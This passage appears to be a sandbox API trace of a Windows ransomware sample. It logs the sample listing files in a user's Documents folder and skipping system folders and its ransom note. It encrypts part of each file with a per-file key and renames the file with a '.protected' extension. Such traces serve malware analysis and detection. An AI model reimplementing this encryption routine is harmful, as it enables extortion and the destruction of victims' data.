lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.608] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.608] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.608] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.608] CloseHandle (hObject=0xb4) returned 1 [0091.608] wnsprintfW (in: pszDest=0x4695e0, 
cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qoqSsP_XOts8.xlsx.protected") returned 71 [0091.608] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qoqSsP_XOts8.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qoqssp_xots8.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qoqSsP_XOts8.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qoqssp_xots8.xlsx.protected")) returned 1 [0091.609] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.609] lstrcmpiW (lpString1="Qvu78VlOA0zogdpA.xlsx", lpString2="Windows") returned -1 [0091.609] lstrcmpiW (lpString1="Qvu78VlOA0zogdpA.xlsx", lpString2="Program Files") returned 1 [0091.609] lstrcmpiW (lpString1="Qvu78VlOA0zogdpA.xlsx", lpString2="Program Files (x86)") returned 1 [0091.609] lstrcmpiW (lpString1="Qvu78VlOA0zogdpA.xlsx", lpString2="$Recycle.bin") returned 1 [0091.609] lstrcmpiW (lpString1="Qvu78VlOA0zogdpA.xlsx", lpString2="System Volume Information") returned -1 [0091.609] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qvu78VlOA0zogdpA.xlsx") returned 65 [0091.609] StrStrIW (lpFirst="Qvu78VlOA0zogdpA.xlsx", lpSrch=".protected") returned 0x0 [0091.609] lstrcmpW (lpString1="Qvu78VlOA0zogdpA.xlsx", lpString2="RESTORE_FILES.txt") returned -1 [0091.609] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.609] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.609] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qvu78VlOA0zogdpA.xlsx" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\documents\\qvu78vloa0zogdpa.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.610] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qvu78VlOA0zogdpA.xlsx") returned 65 [0091.610] StrStrW (lpFirst="Qvu78VlOA0zogdpA.xlsx", lpSrch=".txt") returned 0x0 [0091.610] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qvu78VlOA0zogdpA.xlsx") returned 65 [0091.610] StrStrW (lpFirst="Qvu78VlOA0zogdpA.xlsx", lpSrch=".rar") returned 0x0 [0091.610] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qvu78VlOA0zogdpA.xlsx") returned 65 [0091.610] StrStrW (lpFirst="Qvu78VlOA0zogdpA.xlsx", lpSrch=".zip") returned 0x0 [0091.610] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.611] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.611] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.611] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.611] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.611] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.611] CloseHandle (hObject=0xb4) returned 1 [0091.611] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qvu78VlOA0zogdpA.xlsx.protected") returned 75 [0091.611] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qvu78VlOA0zogdpA.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qvu78vloa0zogdpa.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qvu78VlOA0zogdpA.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qvu78vloa0zogdpa.xlsx.protected")) returned 1 [0091.612] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.612] lstrcmpiW (lpString1="RKpxl.xlsx", lpString2="Windows") returned -1 [0091.612] lstrcmpiW (lpString1="RKpxl.xlsx", lpString2="Program Files") returned 1 [0091.612] lstrcmpiW (lpString1="RKpxl.xlsx", lpString2="Program Files (x86)") returned 1 [0091.612] lstrcmpiW (lpString1="RKpxl.xlsx", lpString2="$Recycle.bin") returned 1 [0091.612] lstrcmpiW (lpString1="RKpxl.xlsx", lpString2="System Volume Information") returned -1 [0091.612] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RKpxl.xlsx") returned 54 [0091.612] StrStrIW (lpFirst="RKpxl.xlsx", lpSrch=".protected") returned 0x0 [0091.612] lstrcmpW (lpString1="RKpxl.xlsx", lpString2="RESTORE_FILES.txt") returned 1 [0091.612] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.612] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\RKpxl.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rkpxl.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.613] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RKpxl.xlsx") returned 54 [0091.613] StrStrW (lpFirst="RKpxl.xlsx", lpSrch=".txt") returned 0x0 [0091.613] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RKpxl.xlsx") returned 54 [0091.613] StrStrW (lpFirst="RKpxl.xlsx", lpSrch=".rar") returned 0x0 [0091.613] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RKpxl.xlsx") returned 54 [0091.613] StrStrW (lpFirst="RKpxl.xlsx", lpSrch=".zip") returned 0x0 [0091.613] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.614] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.614] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.614] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.614] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.614] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.614] CloseHandle (hObject=0xb4) returned 1 [0091.614] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RKpxl.xlsx.protected") returned 64 [0091.615] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RKpxl.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rkpxl.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RKpxl.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rkpxl.xlsx.protected")) returned 1 [0091.616] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.616] lstrcmpiW (lpString1="TBzgIHfG1BHL-r6.odt", lpString2="Windows") returned -1 [0091.616] lstrcmpiW (lpString1="TBzgIHfG1BHL-r6.odt", lpString2="Program Files") returned 1 [0091.616] lstrcmpiW (lpString1="TBzgIHfG1BHL-r6.odt", lpString2="Program Files (x86)") returned 1 [0091.616] lstrcmpiW (lpString1="TBzgIHfG1BHL-r6.odt", lpString2="$Recycle.bin") returned 1 [0091.616] lstrcmpiW (lpString1="TBzgIHfG1BHL-r6.odt", lpString2="System Volume Information") returned 1 [0091.616] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBzgIHfG1BHL-r6.odt") returned 63 [0091.616] StrStrIW (lpFirst="TBzgIHfG1BHL-r6.odt", lpSrch=".protected") returned 0x0 [0091.616] lstrcmpW (lpString1="TBzgIHfG1BHL-r6.odt", lpString2="RESTORE_FILES.txt") returned 1 [0091.616] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.616] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\TBzgIHfG1BHL-r6.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbzgihfg1bhl-r6.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.617] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBzgIHfG1BHL-r6.odt") returned 63 [0091.617] StrStrW (lpFirst="TBzgIHfG1BHL-r6.odt", lpSrch=".txt") returned 0x0 [0091.617] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBzgIHfG1BHL-r6.odt") returned 63 [0091.617] StrStrW (lpFirst="TBzgIHfG1BHL-r6.odt", lpSrch=".rar") returned 0x0 [0091.617] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBzgIHfG1BHL-r6.odt") returned 63 [0091.617] StrStrW (lpFirst="TBzgIHfG1BHL-r6.odt", lpSrch=".zip") returned 0x0 [0091.617] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.628] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.628] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.628] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.628] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.629] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, 
lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.629] CloseHandle (hObject=0xb4) returned 1 [0091.629] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBzgIHfG1BHL-r6.odt.protected") returned 73 [0091.629] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBzgIHfG1BHL-r6.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbzgihfg1bhl-r6.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBzgIHfG1BHL-r6.odt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbzgihfg1bhl-r6.odt.protected")) returned 1 [0091.630] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.630] lstrcmpiW (lpString1="u3y-.docx", lpString2="Windows") returned -1 [0091.630] lstrcmpiW (lpString1="u3y-.docx", lpString2="Program Files") returned 1 [0091.630] lstrcmpiW (lpString1="u3y-.docx", lpString2="Program Files (x86)") returned 1 [0091.630] lstrcmpiW (lpString1="u3y-.docx", lpString2="$Recycle.bin") returned 1 [0091.630] lstrcmpiW (lpString1="u3y-.docx", lpString2="System Volume Information") returned 1 [0091.630] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u3y-.docx") returned 53 [0091.630] StrStrIW (lpFirst="u3y-.docx", lpSrch=".protected") returned 0x0 [0091.630] lstrcmpW (lpString1="u3y-.docx", lpString2="RESTORE_FILES.txt") returned 1 [0091.630] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.630] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\u3y-.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\u3y-.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.633] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u3y-.docx") returned 53 [0091.633] StrStrW (lpFirst="u3y-.docx", lpSrch=".txt") returned 0x0 [0091.633] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u3y-.docx") returned 53 [0091.633] StrStrW (lpFirst="u3y-.docx", lpSrch=".rar") returned 0x0 [0091.633] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u3y-.docx") returned 53 [0091.634] StrStrW (lpFirst="u3y-.docx", lpSrch=".zip") returned 0x0 [0091.634] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.634] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.634] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.635] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.635] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.635] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.635] CloseHandle (hObject=0xb4) returned 1 [0091.635] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u3y-.docx.protected") returned 63 [0091.635] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u3y-.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\u3y-.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u3y-.docx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\u3y-.docx.protected")) returned 1 [0091.636] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.636] lstrcmpiW (lpString1="WEVO2lAcftiAPXrEeW.pptx", lpString2="Windows") returned -1 [0091.636] lstrcmpiW (lpString1="WEVO2lAcftiAPXrEeW.pptx", lpString2="Program Files") returned 1 [0091.636] lstrcmpiW (lpString1="WEVO2lAcftiAPXrEeW.pptx", lpString2="Program Files (x86)") returned 1 [0091.636] lstrcmpiW (lpString1="WEVO2lAcftiAPXrEeW.pptx", lpString2="$Recycle.bin") returned 1 [0091.636] lstrcmpiW (lpString1="WEVO2lAcftiAPXrEeW.pptx", lpString2="System Volume Information") returned 1 [0091.636] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WEVO2lAcftiAPXrEeW.pptx") returned 67 [0091.636] StrStrIW (lpFirst="WEVO2lAcftiAPXrEeW.pptx", lpSrch=".protected") returned 0x0 [0091.636] lstrcmpW (lpString1="WEVO2lAcftiAPXrEeW.pptx", lpString2="RESTORE_FILES.txt") returned 1 [0091.636] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.636] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.636] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WEVO2lAcftiAPXrEeW.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wevo2lacftiapxreew.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.637] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WEVO2lAcftiAPXrEeW.pptx") returned 67 [0091.637] StrStrW (lpFirst="WEVO2lAcftiAPXrEeW.pptx", lpSrch=".txt") returned 0x0 [0091.637] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WEVO2lAcftiAPXrEeW.pptx") returned 67 [0091.637] StrStrW (lpFirst="WEVO2lAcftiAPXrEeW.pptx", lpSrch=".rar") returned 0x0 [0091.637] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WEVO2lAcftiAPXrEeW.pptx") returned 67 [0091.637] StrStrW (lpFirst="WEVO2lAcftiAPXrEeW.pptx", lpSrch=".zip") returned 0x0 [0091.637] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.638] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.638] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.638] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.638] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.638] WriteFile (in: hFile=0xb4, 
lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.639] CloseHandle (hObject=0xb4) returned 1 [0091.639] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WEVO2lAcftiAPXrEeW.pptx.protected") returned 77 [0091.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WEVO2lAcftiAPXrEeW.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wevo2lacftiapxreew.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WEVO2lAcftiAPXrEeW.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wevo2lacftiapxreew.pptx.protected")) returned 1 [0091.640] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.640] lstrcmpiW (lpString1="yIIZHVeyCE2tIEuQQ.pptx", lpString2="Windows") returned 1 [0091.640] lstrcmpiW (lpString1="yIIZHVeyCE2tIEuQQ.pptx", lpString2="Program Files") returned 1 [0091.640] lstrcmpiW (lpString1="yIIZHVeyCE2tIEuQQ.pptx", lpString2="Program Files (x86)") returned 1 [0091.640] lstrcmpiW (lpString1="yIIZHVeyCE2tIEuQQ.pptx", lpString2="$Recycle.bin") returned 1 [0091.640] lstrcmpiW (lpString1="yIIZHVeyCE2tIEuQQ.pptx", lpString2="System Volume Information") returned 1 [0091.641] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yIIZHVeyCE2tIEuQQ.pptx") returned 66 [0091.641] StrStrIW (lpFirst="yIIZHVeyCE2tIEuQQ.pptx", lpSrch=".protected") returned 0x0 [0091.641] lstrcmpW (lpString1="yIIZHVeyCE2tIEuQQ.pptx", lpString2="RESTORE_FILES.txt") returned 1 [0091.641] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.641] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, 
Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yIIZHVeyCE2tIEuQQ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yiizhveyce2tieuqq.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.642] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yIIZHVeyCE2tIEuQQ.pptx") returned 66 [0091.642] StrStrW (lpFirst="yIIZHVeyCE2tIEuQQ.pptx", lpSrch=".txt") returned 0x0 [0091.642] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yIIZHVeyCE2tIEuQQ.pptx") returned 66 [0091.642] StrStrW (lpFirst="yIIZHVeyCE2tIEuQQ.pptx", lpSrch=".rar") returned 0x0 [0091.642] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 